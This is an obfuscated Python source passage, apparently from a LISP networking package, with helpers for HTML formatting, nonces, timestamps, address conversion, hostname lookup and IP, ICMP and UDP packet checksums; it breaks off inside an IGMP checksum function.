if 81 - 81: I1ii11iIi11i - O0 * OoooooooOO
if 23 - 23: II111iiii / oO0o
if 28 - 28: Oo0Ooo * ooOoO0o - OoO0O00
def convert_font ( string ) :
iI11iiii1I = [ [ "[91m" , red ] , [ "[92m" , green ] , [ "[94m" , blue ] , [ "[1m" , bold ] ]
iiiiI1iiiIi = "[0m"
if 84 - 84: OOooOOo
for o0OoO00 in iI11iiii1I :
IIIIIiII1 = o0OoO00 [ 0 ]
iii11 = o0OoO00 [ 1 ]
i1 = len ( IIIIIiII1 )
OO000o00 = string . find ( IIIIIiII1 )
if ( OO000o00 != - 1 ) : break
if 95 - 95: OoO0O00 . i1IIi / i11iIiiIii
if 38 - 38: Oo0Ooo - I11i . Oo0Ooo
while ( OO000o00 != - 1 ) :
ii1111i = string [ OO000o00 : : ] . find ( iiiiI1iiiIi )
O0ooOO = string [ OO000o00 + i1 : OO000o00 + ii1111i ]
string = string [ : OO000o00 ] + iii11 ( O0ooOO , True ) + string [ OO000o00 + ii1111i + i1 : : ]
if 28 - 28: i11iIiiIii / o0oOOo0O0Ooo . iIii1I11I1II1 / II111iiii
OO000o00 = string . find ( IIIIIiII1 )
if 72 - 72: OoooooooOO / I1IiiI + Ii1I / OoOoOO00 * Ii1I
if 34 - 34: O0 * O0 % OoooooooOO + iII111i * iIii1I11I1II1 % Ii1I
if 25 - 25: I11i + OoOoOO00 . o0oOOo0O0Ooo % OoOoOO00 * OOooOOo
if 32 - 32: i11iIiiIii - I1Ii111
if 53 - 53: OoooooooOO - IiII
if ( string . find ( "[1m" ) != - 1 ) : string = convert_font ( string )
return ( string )
if 87 - 87: oO0o . I1IiiI
if 17 - 17: Ii1I . i11iIiiIii
if 5 - 5: I1ii11iIi11i + O0 + O0 . I1Ii111 - ooOoO0o
if 63 - 63: oO0o
if 71 - 71: i1IIi . Ii1I * iII111i % OoooooooOO + OOooOOo
if 36 - 36: IiII
if 49 - 49: OOooOOo / OoooooooOO / I1IiiI
def lisp_space ( num ) :
o0OooooOoOO = ""
for i1i1IIIIIIIi in range ( num ) : o0OooooOoOO += " "
return ( o0OooooOoOO )
if 65 - 65: o0oOOo0O0Ooo
if 7 - 7: IiII . OoOoOO00 / I1ii11iIi11i . OOooOOo * I11i - II111iiii
if 37 - 37: I1Ii111 . OoOoOO00 / O0 * iII111i
if 7 - 7: OoO0O00 * I11i + II111iiii % i11iIiiIii
if 8 - 8: ooOoO0o * O0
if 73 - 73: o0oOOo0O0Ooo / oO0o / I11i / OoO0O00
if 11 - 11: OoOoOO00 + IiII - OoooooooOO / OoO0O00
def lisp_button ( string , url ) :
iIIi1iI1I1IIi = '<button style="background-color:transparent;border-radius:10px; ' + 'type="button">'
if 77 - 77: ooOoO0o / Oo0Ooo + ooOoO0o % o0oOOo0O0Ooo - I1IiiI * I1IiiI
if 23 - 23: iII111i . II111iiii % I1ii11iIi11i - OoooooooOO * Oo0Ooo . iIii1I11I1II1
if ( url == None ) :
I1iI = iIIi1iI1I1IIi + string + "</button>"
else :
O0o00O0Oo0 = '<a href="{}">' . format ( url )
o0 = lisp_space ( 2 )
I1iI = o0 + O0o00O0Oo0 + iIIi1iI1I1IIi + string + "</button></a>" + o0
if 35 - 35: IiII + i1IIi * oO0o - Ii1I . Oo0Ooo
return ( I1iI )
if 31 - 31: o0oOOo0O0Ooo
if 15 - 15: O0 / Oo0Ooo % I1ii11iIi11i + o0oOOo0O0Ooo
if 23 - 23: iIii1I11I1II1 + O0
if 58 - 58: Oo0Ooo
if 9 - 9: iIii1I11I1II1 % I1ii11iIi11i . OOooOOo + OoooooooOO
if 62 - 62: O0 / I1IiiI % O0 * OoO0O00 % I1IiiI
if 33 - 33: I1IiiI . oO0o * OoO0O00 * iIii1I11I1II1
def lisp_print_cour ( string ) :
o0OooooOoOO = '<font face="Courier New">{}</font>' . format ( string )
return ( o0OooooOoOO )
if 5 - 5: Oo0Ooo / IiII % O0 . I1Ii111 * IiII
if 83 - 83: OOooOOo
if 12 - 12: i1IIi . i1IIi - o0oOOo0O0Ooo
if 26 - 26: iIii1I11I1II1 % i11iIiiIii % I1ii11iIi11i
if 67 - 67: OoooooooOO
if 29 - 29: O0 - i11iIiiIii - II111iiii + OOooOOo * IiII
if 2 - 2: i1IIi - ooOoO0o + I1IiiI . o0oOOo0O0Ooo * o0oOOo0O0Ooo / OoOoOO00
def lisp_print_sans ( string ) :
o0OooooOoOO = '<font face="Sans-Serif">{}</font>' . format ( string )
return ( o0OooooOoOO )
if 93 - 93: i1IIi
if 53 - 53: OoooooooOO + Oo0Ooo + oO0o
if 24 - 24: iII111i - IiII - iII111i * I1ii11iIi11i . OoooooooOO / IiII
if 66 - 66: Oo0Ooo
if 97 - 97: i1IIi - OoooooooOO / I1Ii111 * I1IiiI
if 55 - 55: o0oOOo0O0Ooo . iII111i
if 87 - 87: o0oOOo0O0Ooo % iIii1I11I1II1
def lisp_span ( string , hover_string ) :
o0OooooOoOO = '<span title="{}">{}</span>' . format ( hover_string , string )
return ( o0OooooOoOO )
if 100 - 100: I1Ii111 . I1IiiI * I1Ii111 - I1IiiI . I11i * Ii1I
if 89 - 89: OoO0O00 + IiII * I1Ii111
if 28 - 28: OoooooooOO . oO0o % I1ii11iIi11i / i1IIi / OOooOOo
if 36 - 36: o0oOOo0O0Ooo + I11i - IiII + iIii1I11I1II1 + OoooooooOO
if 4 - 4: II111iiii . I11i + Ii1I * I1Ii111 . ooOoO0o
if 87 - 87: OoOoOO00 / OoO0O00 / i11iIiiIii
if 74 - 74: oO0o / I1ii11iIi11i % o0oOOo0O0Ooo
def lisp_eid_help_hover ( output ) :
OO0o0OO0 = '''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
if 56 - 56: i11iIiiIii - Oo0Ooo / iII111i / OoOoOO00
if 43 - 43: o0oOOo0O0Ooo . iII111i . I11i + iIii1I11I1II1
OoOOoO0oOo = lisp_span ( output , OO0o0OO0 )
return ( OoOOoO0oOo )
if 70 - 70: I11i % iIii1I11I1II1 . Oo0Ooo + Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
if 87 - 87: OoO0O00 % I1IiiI
if 77 - 77: iIii1I11I1II1 - i1IIi . oO0o
if 26 - 26: o0oOOo0O0Ooo * IiII . i1IIi
if 59 - 59: O0 + i1IIi - o0oOOo0O0Ooo
if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
def lisp_geo_help_hover ( output ) :
OO0o0OO0 = '''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
if 84 - 84: i11iIiiIii * OoO0O00
if 18 - 18: OOooOOo - Ii1I - OoOoOO00 / I1Ii111 - O0
OoOOoO0oOo = lisp_span ( output , OO0o0OO0 )
return ( OoOOoO0oOo )
if 30 - 30: O0 + I1ii11iIi11i + II111iiii
if 14 - 14: o0oOOo0O0Ooo / OOooOOo - iIii1I11I1II1 - oO0o % ooOoO0o
if 49 - 49: ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
if 57 - 57: OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
if 3 - 3: iII111i . ooOoO0o % I1IiiI + I1ii11iIi11i
if 64 - 64: i1IIi
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
def space ( num ) :
o0OooooOoOO = ""
for i1i1IIIIIIIi in range ( num ) : o0OooooOoOO += " "
return ( o0OooooOoOO )
if 18 - 18: OOooOOo + I1Ii111
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
if 50 - 50: ooOoO0o + i1IIi
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
def lisp_get_ephemeral_port ( ) :
return ( random . randrange ( 32768 , 65535 ) )
if 47 - 47: o0oOOo0O0Ooo
if 66 - 66: I1IiiI - IiII
if 33 - 33: I1IiiI / OoO0O00
if 12 - 12: II111iiii
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
def lisp_get_data_nonce ( ) :
return ( random . randint ( 0 , 0xffffff ) )
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
if 23 - 23: I1Ii111 - OOooOOo + Ii1I - OoOoOO00 * OoOoOO00 . Oo0Ooo
if 47 - 47: oO0o % iIii1I11I1II1
if 11 - 11: I1IiiI % Ii1I - OoO0O00 - oO0o + o0oOOo0O0Ooo
def lisp_get_control_nonce ( ) :
return ( random . randint ( 0 , ( 2 ** 64 ) - 1 ) )
if 98 - 98: iII111i + Ii1I - OoO0O00
if 79 - 79: OOooOOo / I1Ii111 . OoOoOO00 - I1ii11iIi11i
if 47 - 47: OoooooooOO % O0 * iII111i . Ii1I
if 38 - 38: O0 - IiII % I1Ii111
if 64 - 64: iIii1I11I1II1
if 15 - 15: I1ii11iIi11i + OOooOOo / I1ii11iIi11i / I1Ii111
if 31 - 31: ooOoO0o + O0 + ooOoO0o . iIii1I11I1II1 + Oo0Ooo / o0oOOo0O0Ooo
if 6 - 6: Oo0Ooo % IiII * I11i / I1IiiI + Oo0Ooo
if 39 - 39: OoOoOO00 - Oo0Ooo / iII111i * OoooooooOO
def lisp_hex_string ( integer_value ) :
Oooo0oOOO0 = hex ( integer_value ) [ 2 : : ]
if ( Oooo0oOOO0 [ - 1 ] == "L" ) : Oooo0oOOO0 = Oooo0oOOO0 [ 0 : - 1 ]
return ( Oooo0oOOO0 )
if 61 - 61: o0oOOo0O0Ooo / OoOoOO00 - Oo0Ooo
if 19 - 19: iII111i - o0oOOo0O0Ooo / o0oOOo0O0Ooo + Oo0Ooo
if 98 - 98: iIii1I11I1II1 % OOooOOo + I11i . ooOoO0o
if 99 - 99: O0 + O0 * I11i + O0 * oO0o
if 80 - 80: I1IiiI . Ii1I
if 47 - 47: I11i + ooOoO0o + II111iiii % i11iIiiIii
if 93 - 93: I1ii11iIi11i % OoOoOO00 . O0 / iII111i * oO0o
def lisp_get_timestamp ( ) :
return ( time . time ( ) )
if 29 - 29: o0oOOo0O0Ooo
if 86 - 86: II111iiii . IiII
if 2 - 2: OoooooooOO
if 60 - 60: OoO0O00
if 81 - 81: OoOoOO00 % Ii1I
if 87 - 87: iIii1I11I1II1 . OoooooooOO * OoOoOO00
if 100 - 100: OoO0O00 / i1IIi - I1IiiI % Ii1I - iIii1I11I1II1
def lisp_set_timestamp ( seconds ) :
return ( time . time ( ) + seconds )
if 17 - 17: I11i / o0oOOo0O0Ooo % Oo0Ooo
if 71 - 71: IiII . I1Ii111 . OoO0O00
if 68 - 68: i11iIiiIii % oO0o * OoO0O00 * IiII * II111iiii + O0
if 66 - 66: I11i % I1ii11iIi11i % OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / iII111i % O0 . OoO0O00 . i1IIi
if 29 - 29: O0 . I1Ii111
if 66 - 66: oO0o * iIii1I11I1II1 % iIii1I11I1II1 * IiII - ooOoO0o - IiII
def lisp_print_elapsed ( ts ) :
if ( ts == 0 or ts == None ) : return ( "never" )
o0O0oO0 = time . time ( ) - ts
o0O0oO0 = round ( o0O0oO0 , 0 )
return ( str ( datetime . timedelta ( seconds = o0O0oO0 ) ) )
if 77 - 77: O0 . Ii1I
if 39 - 39: ooOoO0o . II111iiii
if 45 - 45: oO0o * OoOoOO00 / iIii1I11I1II1
if 77 - 77: I1Ii111 - I11i
if 11 - 11: I1ii11iIi11i
if 26 - 26: iIii1I11I1II1 * I1Ii111 - OOooOOo
if 27 - 27: I1ii11iIi11i * I1Ii111 - OoO0O00 + Ii1I * Ii1I
def lisp_print_future ( ts ) :
if ( ts == 0 ) : return ( "never" )
o0OO0O0OO0oO0 = ts - time . time ( )
if ( o0OO0O0OO0oO0 < 0 ) : return ( "expired" )
o0OO0O0OO0oO0 = round ( o0OO0O0OO0oO0 , 0 )
return ( str ( datetime . timedelta ( seconds = o0OO0O0OO0oO0 ) ) )
if 9 - 9: oO0o % i11iIiiIii / Oo0Ooo
if 20 - 20: oO0o * O0 + I11i - OoooooooOO . I11i
if 60 - 60: o0oOOo0O0Ooo . o0oOOo0O0Ooo / iII111i
if 45 - 45: O0 . i11iIiiIii % iII111i . OoOoOO00 % IiII % iIii1I11I1II1
if 58 - 58: iIii1I11I1II1 . OoOoOO00 - i11iIiiIii * iIii1I11I1II1 % i11iIiiIii / I1IiiI
if 80 - 80: I1ii11iIi11i / iIii1I11I1II1 % OoOoOO00
if 80 - 80: OoO0O00 % iII111i
if 99 - 99: ooOoO0o / iIii1I11I1II1 - Ii1I * I1ii11iIi11i % I1IiiI
if 13 - 13: OoO0O00
if 70 - 70: I1Ii111 + O0 . oO0o * Ii1I
if 2 - 2: OoooooooOO . OOooOOo . IiII
if 42 - 42: OOooOOo % oO0o / OoO0O00 - oO0o * i11iIiiIii
if 19 - 19: oO0o * I1IiiI % i11iIiiIii
def lisp_print_eid_tuple ( eid , group ) :
iiI1Ii1I = eid . print_prefix ( )
if ( group . is_null ( ) ) : return ( iiI1Ii1I )
if 28 - 28: OOooOOo % ooOoO0o
iiIiII11i1 = group . print_prefix ( )
oOo00Ooo0o0 = group . instance_id
if 33 - 33: I11i
if ( eid . is_null ( ) or eid . is_exact_match ( group ) ) :
OO000o00 = iiIiII11i1 . find ( "]" ) + 1
return ( "[{}](*, {})" . format ( oOo00Ooo0o0 , iiIiII11i1 [ OO000o00 : : ] ) )
if 87 - 87: OoOoOO00 / IiII + iIii1I11I1II1
if 93 - 93: iIii1I11I1II1 + oO0o % ooOoO0o
iii1IiI1I1 = eid . print_sg ( group )
return ( iii1IiI1I1 )
if 64 - 64: ooOoO0o / O0 * OoOoOO00 * ooOoO0o
if 60 - 60: I11i / i1IIi % I1ii11iIi11i / I1ii11iIi11i * I1ii11iIi11i . i11iIiiIii
if 99 - 99: OoOoOO00
if 77 - 77: o0oOOo0O0Ooo
if 48 - 48: OoOoOO00 % I1ii11iIi11i / I11i . iIii1I11I1II1 * II111iiii
if 65 - 65: OoOoOO00
if 31 - 31: I11i * OoOoOO00 . IiII % Ii1I + Oo0Ooo
if 47 - 47: O0 * I1IiiI * OoO0O00 . II111iiii
def lisp_convert_6to4 ( addr_str ) :
if ( addr_str . find ( "::ffff:" ) == - 1 ) : return ( addr_str )
O0o00o000oO = addr_str . split ( ":" )
return ( O0o00o000oO [ - 1 ] )
if 62 - 62: I1ii11iIi11i / I11i . i1IIi
if 99 - 99: OoOoOO00 . I1Ii111
if 59 - 59: I11i / Oo0Ooo / OOooOOo / O0 / OoOoOO00 + o0oOOo0O0Ooo
if 13 - 13: o0oOOo0O0Ooo % oO0o / I1Ii111 % I1Ii111 % O0
if 90 - 90: IiII . ooOoO0o / iIii1I11I1II1
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
if 45 - 45: O0 / i1IIi * oO0o * OoO0O00
if 35 - 35: I1ii11iIi11i / iII111i % I1IiiI + iIii1I11I1II1
if 79 - 79: OoOoOO00 / ooOoO0o
if 77 - 77: Oo0Ooo
if 46 - 46: I1Ii111
def lisp_convert_4to6 ( addr_str ) :
O0o00o000oO = lisp_address ( LISP_AFI_IPV6 , "" , 128 , 0 )
if ( O0o00o000oO . is_ipv4_string ( addr_str ) ) : addr_str = "::ffff:" + addr_str
O0o00o000oO . store_address ( addr_str )
return ( O0o00o000oO )
if 72 - 72: iII111i * OOooOOo
if 67 - 67: i1IIi
if 5 - 5: II111iiii . OoooooooOO
if 57 - 57: I1IiiI
if 35 - 35: OoooooooOO - I1Ii111 / OoO0O00
if 50 - 50: OoOoOO00
if 33 - 33: I11i
if 98 - 98: OoOoOO00 % II111iiii
if 95 - 95: iIii1I11I1II1 - I1Ii111 - OOooOOo + I1Ii111 % I1ii11iIi11i . I1IiiI
def lisp_gethostbyname ( string ) :
IiiIIi1 = string . split ( "." )
iI1iIiiI = string . split ( ":" )
Oo0OOo = string . split ( "-" )
if 36 - 36: O0 * OoO0O00 % iII111i * iII111i / OoO0O00 * IiII
if ( len ( IiiIIi1 ) > 1 ) :
if ( IiiIIi1 [ 0 ] . isdigit ( ) ) : return ( string )
if 14 - 14: i1IIi . IiII + O0 * ooOoO0o
if ( len ( iI1iIiiI ) > 1 ) :
try :
int ( iI1iIiiI [ 0 ] , 16 )
return ( string )
except :
pass
if 76 - 76: OoO0O00
if 92 - 92: I11i - iIii1I11I1II1 % OoooooooOO
if 39 - 39: iII111i . I1IiiI * OoOoOO00 - i11iIiiIii
if 1 - 1: iII111i * OoOoOO00
if 66 - 66: OoOoOO00 + i1IIi % II111iiii . O0 * I1ii11iIi11i % I1ii11iIi11i
if 87 - 87: OOooOOo + o0oOOo0O0Ooo . iII111i - OoooooooOO
if 6 - 6: iIii1I11I1II1 * OoooooooOO
if ( len ( Oo0OOo ) == 3 ) :
for i1i1IIIIIIIi in range ( 3 ) :
try : int ( Oo0OOo [ i1i1IIIIIIIi ] , 16 )
except : break
if 28 - 28: Oo0Ooo * o0oOOo0O0Ooo / I1Ii111
if 52 - 52: O0 / o0oOOo0O0Ooo % iII111i * I1IiiI % OOooOOo
if 69 - 69: I1ii11iIi11i
try :
O0o00o000oO = socket . gethostbyname ( string )
return ( O0o00o000oO )
except :
if ( lisp_is_alpine ( ) == False ) : return ( "" )
if 83 - 83: o0oOOo0O0Ooo
if 38 - 38: I1Ii111 + OoooooooOO . i1IIi
if 19 - 19: iII111i - o0oOOo0O0Ooo - Ii1I - OoOoOO00 . iII111i . I1Ii111
if 48 - 48: iII111i + IiII
if 60 - 60: I11i + iII111i . IiII / i1IIi . iIii1I11I1II1
try :
O0o00o000oO = socket . getaddrinfo ( string , 0 ) [ 0 ]
if ( O0o00o000oO [ 3 ] != string ) : return ( "" )
O0o00o000oO = O0o00o000oO [ 4 ] [ 0 ]
except :
O0o00o000oO = ""
if 14 - 14: OOooOOo
return ( O0o00o000oO )
if 79 - 79: Ii1I
if 76 - 76: iIii1I11I1II1
if 80 - 80: iIii1I11I1II1 . O0 / Ii1I % Ii1I
if 93 - 93: OoooooooOO * Oo0Ooo
if 10 - 10: I1Ii111 * OoooooooOO + I11i - I1ii11iIi11i / I1ii11iIi11i . i11iIiiIii
if 22 - 22: I1Ii111 / o0oOOo0O0Ooo
if 98 - 98: i1IIi
if 51 - 51: I1ii11iIi11i + ooOoO0o + Oo0Ooo / i1IIi + i1IIi
def lisp_ip_checksum ( data , hdrlen = 20 ) :
if ( len ( data ) < hdrlen ) :
lprint ( "IPv4 packet too short, length {}" . format ( len ( data ) ) )
return ( data )
if 12 - 12: iIii1I11I1II1 . Ii1I . I1ii11iIi11i % I1IiiI . II111iiii . oO0o
if 32 - 32: I1ii11iIi11i + IiII / O0 / OoOoOO00 * OoooooooOO % ooOoO0o
iIiiIIi = binascii . hexlify ( data )
if 93 - 93: ooOoO0o . I1ii11iIi11i + iIii1I11I1II1 * I11i * I11i / I1ii11iIi11i
if 28 - 28: OoO0O00 - oO0o + OoOoOO00 + Ii1I / iIii1I11I1II1
if 26 - 26: iIii1I11I1II1 - O0 . O0
if 68 - 68: OOooOOo + oO0o . O0 . Ii1I % i1IIi % OOooOOo
i1I1iI = 0
for i1i1IIIIIIIi in range ( 0 , hdrlen * 2 , 4 ) :
i1I1iI += int ( iIiiIIi [ i1i1IIIIIIIi : i1i1IIIIIIIi + 4 ] , 16 )
if 92 - 92: Oo0Ooo / i11iIiiIii + I1ii11iIi11i
if 87 - 87: OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
i1I1iI = ( i1I1iI >> 16 ) + ( i1I1iI & 0xffff )
i1I1iI += i1I1iI >> 16
i1I1iI = socket . htons ( ~ i1I1iI & 0xffff )
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
i1I1iI = struct . pack ( "H" , i1I1iI )
iIiiIIi = data [ 0 : 10 ] + i1I1iI + data [ 12 : : ]
return ( iIiiIIi )
if 10 - 10: iII111i . i1IIi + Ii1I
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
if 21 - 21: OoOoOO00 - OoooooooOO % i11iIiiIii
if 71 - 71: i1IIi - I11i * I1Ii111 + oO0o - OoO0O00 % I1ii11iIi11i
if 63 - 63: iIii1I11I1II1 + OOooOOo . OoO0O00 / I1IiiI
if 84 - 84: i1IIi
if 42 - 42: II111iiii - OoO0O00 - OoooooooOO . iII111i / OoOoOO00
if 56 - 56: i11iIiiIii - iIii1I11I1II1 . II111iiii
def lisp_icmp_checksum ( data ) :
if ( len ( data ) < 36 ) :
lprint ( "ICMP packet too short, length {}" . format ( len ( data ) ) )
return ( data )
if 81 - 81: IiII / OoOoOO00 * IiII . O0
if 61 - 61: OoO0O00 * OOooOOo + I1Ii111 . iIii1I11I1II1 % I11i . I1Ii111
O0o0oo0oOO0oO = binascii . hexlify ( data )
if 15 - 15: OoO0O00 * II111iiii
if 59 - 59: I1Ii111 + OoO0O00 / OOooOOo
if 97 - 97: Oo0Ooo * iII111i % ooOoO0o . iII111i - I1Ii111 - OOooOOo
if 79 - 79: I1IiiI - ooOoO0o
i1I1iI = 0
for i1i1IIIIIIIi in range ( 0 , 36 , 4 ) :
i1I1iI += int ( O0o0oo0oOO0oO [ i1i1IIIIIIIi : i1i1IIIIIIIi + 4 ] , 16 )
if 37 - 37: IiII . Oo0Ooo * Oo0Ooo * II111iiii * O0
if 83 - 83: IiII / I1Ii111
if 64 - 64: OoO0O00 % IiII . I1Ii111 % OoO0O00 + I11i * IiII
if 83 - 83: o0oOOo0O0Ooo % oO0o + I11i % i11iIiiIii + O0
if 65 - 65: iIii1I11I1II1 % oO0o + O0 / OoooooooOO
i1I1iI = ( i1I1iI >> 16 ) + ( i1I1iI & 0xffff )
i1I1iI += i1I1iI >> 16
i1I1iI = socket . htons ( ~ i1I1iI & 0xffff )
if 52 - 52: Ii1I % OOooOOo * I1IiiI % I11i + OOooOOo / iII111i
if 80 - 80: OoooooooOO + IiII
if 95 - 95: I1Ii111 / oO0o * I1Ii111 - OoooooooOO * OoooooooOO % OoO0O00
if 43 - 43: Oo0Ooo . I1Ii111
i1I1iI = struct . pack ( "H" , i1I1iI )
O0o0oo0oOO0oO = data [ 0 : 2 ] + i1I1iI + data [ 4 : : ]
return ( O0o0oo0oOO0oO )
if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
if 29 - 29: IiII . ooOoO0o - II111iiii
if 68 - 68: iIii1I11I1II1 + II111iiii / oO0o
if 91 - 91: OoOoOO00 % iIii1I11I1II1 . I1IiiI
if 70 - 70: I11i % II111iiii % O0 . i1IIi / I1Ii111
if 100 - 100: I1ii11iIi11i * i11iIiiIii % oO0o / Oo0Ooo / ooOoO0o + I1ii11iIi11i
if 59 - 59: I1Ii111 - IiII
if 14 - 14: iIii1I11I1II1 - iIii1I11I1II1
if 5 - 5: IiII
if 84 - 84: II111iiii * oO0o * II111iiii % IiII / I1IiiI
if 100 - 100: IiII . Ii1I - iIii1I11I1II1 . i11iIiiIii / II111iiii
if 71 - 71: I1Ii111 * Oo0Ooo . I11i
if 49 - 49: IiII * O0 . IiII
if 19 - 19: II111iiii - IiII
if 59 - 59: o0oOOo0O0Ooo * OoO0O00 - Ii1I . OOooOOo
if 89 - 89: OOooOOo
if 69 - 69: ooOoO0o - OoooooooOO * O0
if 84 - 84: ooOoO0o + i11iIiiIii - OOooOOo * ooOoO0o
if 33 - 33: ooOoO0o % i1IIi - oO0o . O0 / O0
if 96 - 96: OoooooooOO + IiII * O0
if 86 - 86: Ii1I
if 29 - 29: iIii1I11I1II1 - OoO0O00 + I1IiiI % iIii1I11I1II1 % OOooOOo
if 84 - 84: IiII + I1ii11iIi11i + Ii1I + iII111i
if 62 - 62: i11iIiiIii + OoOoOO00 + i1IIi
if 69 - 69: OoOoOO00
if 63 - 63: OoO0O00 / OoOoOO00 * iIii1I11I1II1 . I1Ii111
if 85 - 85: i11iIiiIii / i11iIiiIii . OoO0O00 . O0
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
if 88 - 88: o0oOOo0O0Ooo
if 1 - 1: OoooooooOO
if 48 - 48: ooOoO0o * OoOoOO00 - ooOoO0o - OOooOOo + OOooOOo
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
def lisp_udp_checksum ( source , dest , data ) :
if 3 - 3: OoooooooOO
if 71 - 71: IiII + i1IIi - iII111i - i11iIiiIii . I11i - ooOoO0o
if 85 - 85: I1ii11iIi11i - OoOoOO00 / I1ii11iIi11i + OOooOOo - iII111i
if 49 - 49: OoO0O00 - O0 / OoO0O00 * OoOoOO00 + I1Ii111
o0 = lisp_address ( LISP_AFI_IPV6 , source , LISP_IPV6_HOST_MASK_LEN , 0 )
Ii = lisp_address ( LISP_AFI_IPV6 , dest , LISP_IPV6_HOST_MASK_LEN , 0 )
ii1I = socket . htonl ( len ( data ) )
Ooo000000 = socket . htonl ( LISP_UDP_PROTOCOL )
Oo00ooOoO = o0 . pack_address ( )
Oo00ooOoO += Ii . pack_address ( )
Oo00ooOoO += struct . pack ( "II" , ii1I , Ooo000000 )
if 100 - 100: i11iIiiIii / i11iIiiIii
if 89 - 89: iII111i . i11iIiiIii * O0
if 44 - 44: i1IIi . I1IiiI / i11iIiiIii + IiII
if 27 - 27: OOooOOo
O0OO0ooO00 = binascii . hexlify ( Oo00ooOoO + data )
oO0 = len ( O0OO0ooO00 ) % 4
for i1i1IIIIIIIi in range ( 0 , oO0 ) : O0OO0ooO00 += "0"
if 92 - 92: II111iiii
if 45 - 45: O0 % I1IiiI - iII111i . OoO0O00
if 42 - 42: iII111i / o0oOOo0O0Ooo + Oo0Ooo . Oo0Ooo % OOooOOo
if 16 - 16: i1IIi + OoO0O00 % OoOoOO00 + Ii1I * Oo0Ooo
i1I1iI = 0
for i1i1IIIIIIIi in range ( 0 , len ( O0OO0ooO00 ) , 4 ) :
i1I1iI += int ( O0OO0ooO00 [ i1i1IIIIIIIi : i1i1IIIIIIIi + 4 ] , 16 )
if 3 - 3: i11iIiiIii
if 81 - 81: I1IiiI . OoooooooOO * Ii1I . oO0o - O0 * oO0o
if 72 - 72: II111iiii - OOooOOo + I1IiiI - I11i
if 91 - 91: II111iiii
if 53 - 53: OoO0O00 % o0oOOo0O0Ooo / OOooOOo % IiII % OoO0O00 % OoooooooOO
i1I1iI = ( i1I1iI >> 16 ) + ( i1I1iI & 0xffff )
i1I1iI += i1I1iI >> 16
i1I1iI = socket . htons ( ~ i1I1iI & 0xffff )
if 31 - 31: I1IiiI
if 73 - 73: ooOoO0o . O0 / o0oOOo0O0Ooo - OoooooooOO % i11iIiiIii
if 80 - 80: Ii1I / ooOoO0o % O0 . Oo0Ooo
if 63 - 63: OOooOOo . II111iiii . I11i
i1I1iI = struct . pack ( "H" , i1I1iI )
O0OO0ooO00 = data [ 0 : 6 ] + i1I1iI + data [ 8 : : ]
return ( O0OO0ooO00 )
if 46 - 46: ooOoO0o % IiII - o0oOOo0O0Ooo - Oo0Ooo - Ii1I / I11i
if 68 - 68: i1IIi - I1ii11iIi11i / Oo0Ooo % I11i . iII111i
if 9 - 9: IiII
if 48 - 48: o0oOOo0O0Ooo + o0oOOo0O0Ooo - Oo0Ooo
if 27 - 27: OoO0O00 + OoOoOO00 * ooOoO0o
if 83 - 83: iIii1I11I1II1
if 72 - 72: I11i
if 87 - 87: i1IIi
def lisp_igmp_checksum ( igmp ) :
II1IIiIiiI1iI = binascii . hexlify ( igmp )
if 80 - 80: I1ii11iIi11i
if 5 - 5: i1IIi * OoOoOO00 % I1IiiI . OoO0O00 * I1ii11iIi11i - I1Ii111
if 79 - 79: oO0o % o0oOOo0O0Ooo % OoOoOO00
if 45 - 45: I1IiiI * OOooOOo % OoO0O00
i1I1iI = 0
for i1i1IIIIIIIi in range ( 0 , 24 , 4 ) :
i1I1iI += int ( II1IIiIiiI1iI [ i1i1IIIIIIIi : i1i1IIIIIIIi + 4 ] , 16 )
